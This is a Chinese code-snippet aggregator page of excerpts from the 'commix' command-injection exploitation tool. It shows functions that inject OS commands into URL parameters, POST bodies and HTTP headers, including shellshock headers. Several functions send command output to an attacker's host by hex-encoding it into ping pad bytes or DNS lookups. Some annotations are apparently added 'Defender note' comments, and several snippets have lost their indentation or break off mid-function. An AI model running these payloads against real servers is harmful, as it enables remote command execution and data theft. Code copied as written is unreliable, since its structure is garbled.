本文整理汇总了Python中src.utils.settings.print_payload函数的典型用法代码示例。如果您正苦于以下问题:Python print_payload函数的具体用法?Python print_payload怎么用?Python print_payload使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。
在下文中一共展示了print_payload函数的20个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于我们的系统推荐出更棒的Python代码示例。
示例1: cmd_exec
def cmd_exec(http_request_method, cmd, url, vuln_parameter, ip_src):
    """Send one command wrapped in the ICMP-exfiltration payload.

    The payload pipes the command output through ``xxd`` and runs one
    ``ping`` per hex line towards ``ip_src``, carrying that line in the ICMP
    pad pattern (``ping -p``).  For GET the payload is appended to the URL
    (INJECT_TAG removed, spaces written as %20); for any other method it is
    sent as the url-encoded value of ``vuln_parameter``.

    Defender note: on the receiving host this appears as ``xxd`` feeding a
    loop of ``ping -p <hex>`` invocations, and on the wire as echo requests
    whose pad bytes are not the default pattern.

    Terminates with SystemExit when the request raises urllib2.HTTPError.
    """
    global add_new_line

    # Line width for xxd and the matching ICMP data size (twice the width).
    line_width = str(exfiltration_length)
    icmp_size = str(exfiltration_length * 2)
    exfil_payload = ("; " + cmd + " | xxd -p -c" + line_width + " | while read line; do ping -p $line -c1 -s" + icmp_size + " -q " + ip_src + "; done")

    # The command and the payload are echoed only when "--verbose" is set.
    if settings.VERBOSITY_LEVEL >= 1:
        sys.stdout.write(settings.print_info_msg("Executing the '" + cmd + "' command... "))
        sys.stdout.flush()
        sys.stdout.write("\n" + settings.print_payload(exfil_payload) + "\n")

    if http_request_method != "GET":
        post_body = urllib.urlencode({vuln_parameter: exfil_payload})
        req = urllib2.Request(url=url, data=post_body)
    else:
        req = url.replace(settings.INJECT_TAG, "") + exfil_payload.replace(" ", "%20")

    try:
        sys.stdout.write(Fore.GREEN + Style.BRIGHT + "\n")
        response = urllib2.urlopen(req)
        # Fixed pause after the request before the colour reset.
        time.sleep(3)
        sys.stdout.write(Style.RESET_ALL)
        if add_new_line:
            print "\n"
            add_new_line = True
        else:
            print ""
    except urllib2.HTTPError, err_msg:
        print settings.print_critical_msg(str(err_msg.code))
        raise SystemExit()
开发者ID:security-geeks,项目名称:commix,代码行数:35,代码来源:icmp_exfiltration.py
示例2: cmd_exec
def cmd_exec(dns_server, http_request_method, cmd, url, vuln_parameter):
    """Send one command wrapped in the DNS-exfiltration payload.

    The payload hex-dumps the command output with ``xxd`` (16 bytes per
    line) and issues one ``host <hex>.xxx`` lookup per line against
    ``dns_server``.  For GET the payload is appended to the URL (INJECT_TAG
    removed, spaces written as %20); otherwise it is posted as the
    url-encoded value of ``vuln_parameter``.

    Defender note: the network indicator is a quick series of lookups sent
    to a single resolver whose left-most label is a run of hex digits.
    """
    exfil_payload = ("; " + cmd + " | xxd -p -c 16 | while read line; do host $line.xxx " + dns_server + "; done")

    # The payload is echoed only when "--verbose" is set.
    if settings.VERBOSITY_LEVEL >= 1:
        sys.stdout.write("\n" + settings.print_payload(exfil_payload))

    if http_request_method != "GET":
        post_body = urllib.urlencode({vuln_parameter: exfil_payload})
        req = urllib2.Request(url=url, data=post_body)
    else:
        req = url.replace(settings.INJECT_TAG, "") + exfil_payload.replace(" ", "%20")

    sys.stdout.write(Fore.GREEN + Style.BRIGHT + "\n")
    response = urllib2.urlopen(req)
    # Fixed pause after the request before the colour reset.
    time.sleep(2)
    sys.stdout.write("\n" + Style.RESET_ALL)
开发者ID:aventado,项目名称:commix,代码行数:21,代码来源:dns_exfiltration.py
示例3: cmd_exec
def cmd_exec(http_request_method, cmd, url, vuln_parameter, ip_src):
    """Send one command wrapped in the ICMP-exfiltration payload.

    Older variant with a fixed width: ``xxd`` emits 16 bytes per line and
    each line is sent to ``ip_src`` as the pad pattern of a single
    ``ping -p`` echo request.  For GET the payload is appended to the URL
    (INJECT_TAG removed, spaces written as %20); otherwise it is posted as
    the url-encoded value of ``vuln_parameter``.

    Defender note: echo requests whose pad bytes are not the default
    pattern, sent in a burst to one address, are the network indicator.
    """
    exfil_payload = ("; " + cmd + " | xxd -p -c 16 | while read line; do ping -p $line -c 1 -s16 -q " + ip_src + "; done")

    # The payload is echoed only when the verbose option is set.
    if menu.options.verbose:
        sys.stdout.write("\n" + settings.print_payload(exfil_payload))

    if http_request_method != "GET":
        post_body = urllib.urlencode({vuln_parameter: exfil_payload})
        req = urllib2.Request(url=url, data=post_body)
    else:
        req = url.replace(settings.INJECT_TAG, "") + exfil_payload.replace(" ", "%20")

    sys.stdout.write(Fore.GREEN + Style.BRIGHT + "\n")
    response = urllib2.urlopen(req)
    # Fixed pause after the request before the colour reset.
    time.sleep(2)
    sys.stdout.write("\n" + Style.RESET_ALL)
    print ""
开发者ID:ardiansn,项目名称:commix,代码行数:22,代码来源:icmp_exfiltration.py
示例4: check_for_shell
# Run `cmd` through a shellshock payload carried in one request header and
# return the tuple (command output, payload).
#
# NOTE(review): this listing lost its indentation; the nesting of the
# statements below is shown as published and has not been reconstructed.
#
# Defender note: the injected string travels in the request header named by
# `check_header`, not in the URL or body, so only header logging captures it.
def check_for_shell(url, cmd, cve, check_header, filename):
try:
# Random six-letter marker echoed on both sides of the command output so the
# output can be cut out of the response body. It is a delimiter, not a secret,
# so the non-cryptographic `random` module is adequate here.
TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
cmd = "echo " + TAG + "$(" + cmd + ")" + TAG
# The payload format is defined by shellshock_exploitation(), not visible here.
payload = shellshock_exploitation(cve, cmd)
info_msg = "Executing the '" + cmd + "' command... "
# Both verbosity branches write the same message.
if settings.VERBOSITY_LEVEL == 1:
sys.stdout.write(settings.print_info_msg(info_msg))
elif settings.VERBOSITY_LEVEL > 1:
sys.stdout.write(settings.print_info_msg(info_msg))
sys.stdout.flush()
if settings.VERBOSITY_LEVEL >= 1:
sys.stdout.write("\n" + settings.print_payload(payload)+ "\n")
# The payload is the value of a single header; the request has no body.
header = {check_header : payload}
request = urllib2.Request(url, None, header)
# Keep the global User-Agent option in step with what this request sends.
if check_header == "User-Agent":
menu.options.agent = payload
else:
menu.options.agent = default_user_agent
log_http_headers.do_check(request)
log_http_headers.check_http_traffic(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
response = proxy.use_proxy(request)
# Check if defined Tor.
elif menu.options.tor:
response = tor.use_tor(request)
else:
response = urllib2.urlopen(request)
# Flatten the body to one line, then keep only what lies between the markers.
shell = response.read().rstrip().replace('\n',' ')
shell = re.findall(r"" + TAG + "(.*)" + TAG, shell)
shell = ''.join(shell)
return shell, payload
# A URL error is reported as critical and ends the program.
except urllib2.URLError, err_msg:
print "\n" + settings.print_critical_msg(err_msg)
raise SystemExit()
开发者ID:security-geeks,项目名称:commix,代码行数:39,代码来源:shellshock.py
示例5: check_injection
# Build the command-execution payload from fb_payloads, place it at the
# configured injection point, send the request and return the response.
#
# The incoming `payload` argument is overwritten before it is read. `TAG` and
# `filename` are not used in the visible body.
#
# NOTE(review): this listing lost its indentation; the nesting of the
# statements below is shown as published and has not been reconstructed.
#
# Defender note: the branches below show every request location that can
# carry the injected string: Cookie, User-Agent, Referer, Host, a custom
# header, the URL, and a form/JSON/XML POST body. Input validation and request
# logging therefore need to cover headers as well as parameters.
def check_injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
# Execute shell commands on vulnerable host.
if alter_shell :
payload = fb_payloads.cmd_execution_alter_shell(separator, cmd, OUTPUT_TEXTFILE)
else:
payload = fb_payloads.cmd_execution(separator, cmd, OUTPUT_TEXTFILE)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Whitespace fixation
payload = payload.replace(" ", whitespace)
# Perform payload modification
payload = checks.perform_payload_modification(payload)
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL >= 1:
payload_msg = payload.replace("\n", "\\n")
# NOTE(review): `payload` itself is truncated at settings.COMMENT here. If this
# sits inside the verbosity branch (nesting not recoverable from this listing),
# the request sent differs between verbose and quiet runs. Confirm.
if settings.COMMENT in payload_msg:
payload = payload.split(settings.COMMENT)[0].strip()
payload_msg = payload_msg.split(settings.COMMENT)[0].strip()
info_msg = "Executing the '" + cmd.split(settings.COMMENT)[0].strip() + "' command... "
sys.stdout.write(settings.print_info_msg(info_msg))
sys.stdout.flush()
output_payload = "\n" + settings.print_payload(payload)
if settings.VERBOSITY_LEVEL >= 1:
output_payload = output_payload + "\n"
sys.stdout.write(output_payload)
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
response = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
response = user_agent_injection_test(url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
response = referer_injection_test(url, vuln_parameter, payload)
# Check if defined host with "INJECT_HERE" tag
elif menu.options.host and settings.INJECT_TAG in menu.options.host:
response = host_injection_test(url, vuln_parameter, payload)
# Check if defined custom header with "INJECT_HERE" tag
elif settings.CUSTOM_HEADER_INJECTION:
response = custom_header_injection_test(url, vuln_parameter, payload)
else:
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
#url = parameters.do_GET_check(url)
# Only spaces are percent-encoded before the payload replaces the tag in the URL.
payload = payload.replace(" ","%20")
target = url.replace(settings.INJECT_TAG, payload)
vuln_parameter = ''.join(vuln_parameter)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
else :
# Check if defined method is POST.
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Define the POST data
if settings.IS_JSON:
# Escape double quotes so the payload stays inside its JSON string value.
payload = payload.replace("\"", "\\\"")
data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload))
# NOTE(review): the bare except hides every parse failure. When json.loads
# fails, `data` is still a str and json.dumps below encodes it as one JSON
# string literal rather than as the intended object.
try:
data = json.loads(data, strict = False)
except:
pass
request = urllib2.Request(url, json.dumps(data))
else:
if settings.IS_XML:
data = parameter.replace(settings.INJECT_TAG, urllib.unquote(payload))
else:
data = parameter.replace(settings.INJECT_TAG, payload)
request = urllib2.Request(url, data)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
return response
开发者ID:security-geeks,项目名称:commix,代码行数:94,代码来源:fb_injector.py
示例6: tfb_injection_handler
def tfb_injection_handler(url, delay, filename, tmp_path, http_request_method, url_time_response):
counter = 1
num_of_chars = 1
vp_flag = True
no_result = True
is_encoded = False
possibly_vulnerable = False
false_positive_warning = False
how_long_statistic = []
export_injection_info = False
how_long = 0
injection_type = "semi-blind command injection"
technique = "tempfile-based injection technique"
# Check if defined "--maxlen" option.
if menu.options.maxlen:
maxlen = settings.MAXLEN
# Check if defined "--url-reload" option.
if menu.options.url_reload == True:
err_msg = "The '--url-reload' option is not available in " + technique + "!"
print settings.print_critical_msg(err_msg)
whitespace = checks.check_whitespaces()
if settings.VERBOSITY_LEVEL >= 1:
info_msg ="Testing the " + technique + "... "
print settings.print_info_msg(info_msg)
# Calculate all possible combinations
total = (len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION))
for prefix in settings.PREFIXES:
for suffix in settings.SUFFIXES:
for separator in settings.SEPARATORS:
if settings.LOAD_SESSION:
cmd = shell = ""
url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, delay, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(url, http_request_method)
checks.check_for_stored_tamper(payload)
settings.FOUND_HOW_LONG = how_long
settings.FOUND_DIFF = how_long - delay
OUTPUT_TEXTFILE = tmp_path + TAG + ".txt"
else:
num_of_chars = num_of_chars + 1
# Check for bad combination of prefix and separator
combination = prefix + separator
if combination in settings.JUNK_COMBINATION:
prefix = ""
# Change TAG on every request to prevent false-positive resutls.
TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6))
# The output file for file-based injection technique.
OUTPUT_TEXTFILE = tmp_path + TAG + ".txt"
alter_shell = menu.options.alter_shell
tag_length = len(TAG) + 4
for output_length in range(1, int(tag_length)):
try:
# Tempfile-based decision payload (check if host is vulnerable).
if alter_shell :
payload = tfb_payloads.decision_alter_shell(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)
else:
payload = tfb_payloads.decision(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Whitespace fixation
payload = re.sub(" ", whitespace, payload)
# Encode payload to Base64
if settings.TAMPER_SCRIPTS['base64encode']:
from src.core.tamper import base64encode
payload = base64encode.encode(payload)
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL >= 1:
payload_msg = payload.replace("\n", "\\n")
print settings.print_payload(payload_msg)
# Cookie Injection
if settings.COOKIE_INJECTION == True:
# Check if target host is vulnerable to cookie injection.
vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
how_long = tfb_injector.cookie_injection_test(url, vuln_parameter, payload)
# User-Agent Injection
elif settings.USER_AGENT_INJECTION == True:
# Check if target host is vulnerable to user-agent injection.
vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
how_long = tfb_injector.user_agent_injection_test(url, vuln_parameter, payload)
# Referer Injection
elif settings.REFERER_INJECTION == True:
# Check if target host is vulnerable to referer injection.
#.........这里部分代码省略.........
开发者ID:dtrip,项目名称:commix,代码行数:101,代码来源:tfb_handler.py
示例7: cb_injection_handler
def cb_injection_handler(url, timesec, filename, http_request_method):
shell = False
counter = 1
vp_flag = True
no_result = True
is_encoded = False
export_injection_info = False
injection_type = "results-based OS command injection"
technique = "classic command injection technique"
if not settings.LOAD_SESSION:
info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "... "
sys.stdout.write(settings.print_info_msg(info_msg))
sys.stdout.flush()
if settings.VERBOSITY_LEVEL >= 1:
print ""
i = 0
# Calculate all possible combinations
total = len(settings.WHITESPACE) * len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES)
for whitespace in settings.WHITESPACE:
for prefix in settings.PREFIXES:
for suffix in settings.SUFFIXES:
for separator in settings.SEPARATORS:
if whitespace == " ":
whitespace = urllib.quote(whitespace)
# Check injection state
settings.DETECTION_PHASE = True
settings.EXPLOITATION_PHASE = False
# If a previous session is available.
if settings.LOAD_SESSION and session_handler.notification(url, technique, injection_type):
try:
settings.CLASSIC_STATE = True
url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, timesec, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(url, http_request_method)
checks.check_for_stored_tamper(payload)
except TypeError:
err_msg = "An error occurred while accessing session file ('"
err_msg += settings.SESSION_FILE + "'). "
err_msg += "Use the '--flush-session' option."
print settings.print_critical_msg(err_msg)
raise SystemExit()
else:
i = i + 1
# Check for bad combination of prefix and separator
combination = prefix + separator
if combination in settings.JUNK_COMBINATION:
prefix = ""
# Change TAG on every request to prevent false-positive results.
TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
randv1 = random.randrange(100)
randv2 = random.randrange(100)
randvcalc = randv1 + randv2
# Define alter shell
alter_shell = menu.options.alter_shell
try:
if alter_shell:
# Classic -alter shell- decision payload (check if host is vulnerable).
payload = cb_payloads.decision_alter_shell(separator, TAG, randv1, randv2)
else:
# Classic decision payload (check if host is vulnerable).
payload = cb_payloads.decision(separator, TAG, randv1, randv2)
# Define prefixes & suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Whitespace fixation
payload = payload.replace(" ", whitespace)
# Perform payload modification
payload = checks.perform_payload_modification(payload)
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL == 1:
print settings.print_payload(payload)
elif settings.VERBOSITY_LEVEL > 1:
info_msg = "Generating a payload for injection..."
print settings.print_info_msg(info_msg)
print settings.print_payload(payload)
# Cookie header injection
if settings.COOKIE_INJECTION == True:
# Check if target host is vulnerable to cookie header injection.
vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
response = cb_injector.cookie_injection_test(url, vuln_parameter, payload)
# User-Agent HTTP header injection
elif settings.USER_AGENT_INJECTION == True:
# Check if target host is vulnerable to user-agent HTTP header injection.
vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
response = cb_injector.user_agent_injection_test(url, vuln_parameter, payload)
# Referer HTTP header injection
elif settings.REFERER_INJECTION == True:
# Check if target host is vulnerable to referer HTTP header injection.
#.........这里部分代码省略.........
开发者ID:security-geeks,项目名称:commix,代码行数:101,代码来源:cb_handler.py
示例8: check_injection
# Build the command-execution payload from eb_payloads, place it at the
# configured injection point, send the request and return the response.
#
# `filename` is not used in the visible body.
#
# NOTE(review): this listing lost its indentation; the nesting of the
# statements below is shown as published and has not been reconstructed.
#
# Defender note: the branches below show the request locations that can carry
# the injected string: Cookie, User-Agent, Referer, a custom header, the URL,
# and a form or JSON POST body. Request logging limited to URLs and bodies
# misses the header cases.
def check_injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename):
# Execute shell commands on vulnerable host.
if alter_shell:
payload = eb_payloads.cmd_execution_alter_shell(separator, TAG, cmd)
else:
payload = eb_payloads.cmd_execution(separator, TAG, cmd)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Fixation for specific payload.
# Removes the encoded ';' (%3B) that precedes the encoded ")}" tail.
if ")%3B" + urllib.quote(")}") in payload:
payload = payload.replace(")%3B" + urllib.quote(")}"), ")" + urllib.quote(")}"))
# Whitespace fixation
payload = re.sub(" ", whitespace, payload)
# Optional tamper step: the whole payload is passed through the base64encode module.
if settings.TAMPER_SCRIPTS['base64encode']:
from src.core.tamper import base64encode
payload = base64encode.encode(payload)
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL >= 1:
info_msg = "Executing the '" + cmd + "' command: "
sys.stdout.write("\n" + settings.print_info_msg(info_msg))
sys.stdout.flush()
sys.stdout.write("\n" + settings.print_payload(payload) + "\n")
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
response = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
response = user_agent_injection_test(url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
response = referer_injection_test(url, vuln_parameter, payload)
# Check if defined custom header with "INJECT_HERE" tag
elif settings.CUSTOM_HEADER_INJECTION:
response = custom_header_injection_test(url, vuln_parameter, payload)
else:
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
#url = parameters.do_GET_check(url)
# NOTE(review): re.sub treats `payload` as a replacement template, so any
# backslash sequence in it is interpreted rather than copied. str.replace
# would insert the payload literally. The two re.sub calls on the POST path
# below are affected in the same way.
target = re.sub(settings.INJECT_TAG, payload, url)
vuln_parameter = ''.join(vuln_parameter)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
else :
# Check if defined method is POST.
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Re-encode literal '+' in the unquoted POST data as %2B.
parameter = parameter.replace("+","%2B")
# Define the POST data
if settings.IS_JSON == False:
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
else:
# Escape double quotes so the payload stays inside its JSON string value.
payload = payload.replace("\"", "\\\"")
data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter)
# NOTE(review): json.loads is unguarded here, so a body that is not valid
# JSON after substitution raises to the caller.
data = json.loads(data, strict = False)
request = urllib2.Request(url, json.dumps(data))
# Check if defined extra headers.
headers.do_check(request)
# Get the response of the request
response = requests.get_request_response(request)
return response
开发者ID:BMaChina,项目名称:commix,代码行数:86,代码来源:eb_injector.py
示例9: shellshock_handler
def shellshock_handler(url, http_request_method, filename):
counter = 1
vp_flag = True
no_result = True
export_injection_info = False
injection_type = "results-based command injection"
technique = "shellshock injection technique"
info_msg = "Testing the " + technique + "... "
sys.stdout.write(settings.print_info_msg(info_msg))
sys.stdout.flush()
try:
i = 0
total = len(shellshock_cves) * len(headers)
for cve in shellshock_cves:
for check_header in headers:
i = i + 1
attack_vector = "echo " + cve + ":Done;"
payload = shellshock_payloads(cve, attack_vector)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + settings.print_payload(payload))
header = {check_header : payload}
request = urllib2.Request(url, None, header)
response = urllib2.urlopen(request)
if not menu.options.verbose:
percent = ((i*100)/total)
float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2))
if str(float_percent) == "100.0":
if no_result == True:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
else:
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
elif cve in response.info():
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
else:
percent = str(float_percent )+ "%"
info_msg = "Testing the " + technique + "... " + "[ " + percent + " ]"
sys.stdout.write("\r" + settings.print_info_msg(info_msg))
sys.stdout.flush()
# Print the findings to log file.
if export_injection_info == False:
export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
if vp_flag == True:
vuln_parameter = "HTTP Header"
vp_flag = logs.add_parameter(vp_flag, filename, check_header, vuln_parameter, payload)
logs.update_payload(filename, counter, payload)
if cve in response.info():
no_result = False
success_msg = "The (" + check_header + ") '" + Style.UNDERLINE
success_msg += url + Style.RESET_ALL + Style.BRIGHT + "' is vulnerable to " + injection_type + "."
print "\n" + settings.print_success_msg(success_msg)
print " (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type.title() + Style.RESET_ALL + ""
print " (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
print " (+) Payload : " + Fore.YELLOW + Style.BRIGHT + "\"" + payload + "\"" + Style.RESET_ALL
if not menu.options.verbose:
print ""
# Enumeration options.
if settings.ENUMERATION_DONE == True :
if menu.options.verbose:
print ""
while True:
question_msg = "Do you want to enumerate again? [Y/n/q] > "
enumerate_again = raw_input(settings.print_question_msg(question_msg)).lower()
if enumerate_again in settings.CHOICE_YES:
enumeration(url, cve, check_header, filename)
break
elif enumerate_again in settings.CHOICE_NO:
break
elif enumerate_again in settings.CHOICE_QUIT:
sys.exit(0)
else:
if enumerate_again == "":
enumerate_again = "enter"
err_msg = "'" + enumerate_again + "' is not a valid answer."
print settings.print_error_msg(err_msg) + "\n"
pass
else:
enumeration(url, cve, check_header, filename)
# File access options.
if settings.FILE_ACCESS_DONE == True :
while True:
question_msg = "Do you want to access files again? [Y/n/q] > "
file_access_again = raw_input(settings.print_question_msg(question_msg)).lower()
if file_access_again in settings.CHOICE_YES:
file_access(url, cve, check_header, filename)
break
elif file_access_again in settings.CHOICE_NO:
break
#.........这里部分代码省略.........
开发者ID:ardiansn,项目名称:commix,代码行数:101,代码来源:shellshock.py
示例10: check_for_shell
header = { check_header : payload }
request = urllib2.Request(url, None, header)
response = urllib2.urlopen(request)
shell = response.read().rstrip()
return shell, payload
except urllib2.URLError, err_msg:
print "\n" + settings.print_error_msg(err_msg)
sys.exit(0)
shell, payload = check_for_shell(url, cmd, cve, check_header, filename)
if len(shell) == 0:
cmd = "/bin/" + cmd
shell, payload = check_for_shell(url, cmd, cve, check_header, filename)
if menu.options.verbose and len(shell) > 0:
sys.stdout.write("\n" + settings.print_payload(payload))
if len(shell) == 0:
cmd = "/usr" + cmd
shell, payload = check_for_shell(url, cmd, cve, check_header, filename)
if menu.options.verbose and len(shell) > 0:
sys.stdout.write("\n" + settings.print_payload(payload))
return shell, payload
"""
The exploitation function.
(call the injection handler)
"""
def exploitation(url, http_request_method, filename):
    """Call the shellshock injection handler for `url`.

    Returns False when the handler's result compares equal to False;
    otherwise returns None.
    """
    handler_result = shellshock_handler(url, http_request_method, filename)
    # Equality rather than identity is kept on purpose: any result that
    # compares equal to False counts as a failure.
    if handler_result == False:
        return False
开发者ID:ardiansn,项目名称:commix,代码行数:31,代码来源:shellshock.py
示例11: fb_injection_handler
def fb_injection_handler(url, timesec, filename, http_request_method, url_time_response):
shell = False
counter = 1
vp_flag = True
exit_loops = False
no_result = True
is_encoded = False
stop_injection = False
call_tmp_based = False
next_attack_vector = False
export_injection_info = False
injection_type = "semi-blind command injection"
technique = "file-based command injection technique"
tmp_path = check_tmp_path(url, timesec, filename, http_request_method, url_time_response)
if not settings.LOAD_SESSION or settings.RETEST == True:
TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
info_msg = "Trying to create a file in '" + settings.WEB_ROOT
info_msg += "' for command execution results... "
print settings.print_info_msg(info_msg)
i = 0
# Calculate all possible combinations
total = len(settings.WHITESPACE) * len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES)
# Check if defined alter shell
alter_shell = menu.options.alter_shell
for whitespace in settings.WHITESPACE:
for prefix in settings.PREFIXES:
for suffix in settings.SUFFIXES:
for separator in settings.SEPARATORS:
# Check injection state
settings.DETECTION_PHASE = True
settings.EXPLOITATION_PHASE = False
# If a previous session is available.
if settings.LOAD_SESSION:
try:
settings.FILE_BASED_STATE = True
url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, timesec, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(url, http_request_method)
checks.check_for_stored_tamper(payload)
OUTPUT_TEXTFILE = TAG + ".txt"
session_handler.notification(url, technique, injection_type)
if technique == "tempfile-based injection technique":
#settings.LOAD_SESSION = True
tfb_handler.exploitation(url, timesec, filename, tmp_path, http_request_method, url_time_response)
except TypeError:
err_msg = "An error occurred while accessing session file ('"
err_msg += settings.SESSION_FILE + "'). "
err_msg += "Use the '--flush-session' option."
print settings.print_critical_msg(err_msg)
raise SystemExit()
if settings.RETEST == True:
settings.RETEST = False
from src.core.injections.results_based.techniques.classic import cb_handler
cb_handler.exploitation(url, timesec, filename, http_request_method)
if not settings.LOAD_SESSION:
i = i + 1
# The output file for file-based injection technique.
OUTPUT_TEXTFILE = TAG + ".txt"
# Check for bad combination of prefix and separator
combination = prefix + separator
if combination in settings.JUNK_COMBINATION:
prefix = ""
try:
# File-based decision payload (check if host is vulnerable).
if alter_shell :
payload = fb_payloads.decision_alter_shell(separator, TAG, OUTPUT_TEXTFILE)
else:
payload = fb_payloads.decision(separator, TAG, OUTPUT_TEXTFILE)
# Check if defined "--prefix" option.
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Whitespace fixation
payload = payload.replace(" ", whitespace)
# Perform payload modification
payload = checks.perform_payload_modification(payload)
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL == 1:
payload_msg = payload.replace("\n", "\\n")
print settings.print_payload(payload_msg)
# Check if defined "--verbose" option.
elif settings.VERBOSITY_LEVEL > 1:
info_msg = "Generating a payload for injection..."
print settings.print_info_msg(info_msg)
print settings.print_payload(payload)
# Cookie Injection
if settings.COOKIE_INJECTION == True:
# Check if target host is vulnerable to cookie header injection.
vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
response = fb_injector.cookie_injection_test(url, vuln_parameter, payload)
#.........这里部分代码省略.........
开发者ID:security-geeks,项目名称:commix,代码行数:101,代码来源:fb_handler.py
示例12: false_positive_check
def false_positive_check(separator, TAG, cmd, prefix, suffix, whitespace, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, randvcalc, alter_shell, how_long, url_time_response):
found_chars = False
if settings.VERBOSITY_LEVEL >= 1:
info_msg = "Testing the reliability of used payload... "
sys.stdout.write(settings.print_info_msg(info_msg))
sys.stdout.flush()
for output_length in range(1, 3):
# Execute shell commands on vulnerable host.
if alter_shell :
payload = tfb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method)
else:
payload = tfb_payloads.cmd_execution(separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Whitespace fixation
payload = re.sub(" ", whitespace, payload)
if settings.TAMPER_SCRIPTS['base64encode']:
payload = base64.b64encode(payload)
# Check if defined "--verbose" option.
if settings.VERBOSITY_LEVEL >= 1:
payload_msg = payload.replace("\n", "\\n")
sys.stdout.write("\n" + settings.print_payload(payload_msg))
# Check if defined cookie with "INJECT_HERE" tag
if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
how_long = cookie_injection_test(url, vuln_parameter, payload)
# Check if defined user-agent with "INJECT_HERE" tag
elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
how_long = user_agent_injection_test(url, vuln_parameter, payload)
# Check if defined referer with "INJECT_HERE" tag
elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
how_long = referer_injection_test(url, vuln_parameter, payload)
# Check if defined custom header with "INJECT_HERE" tag
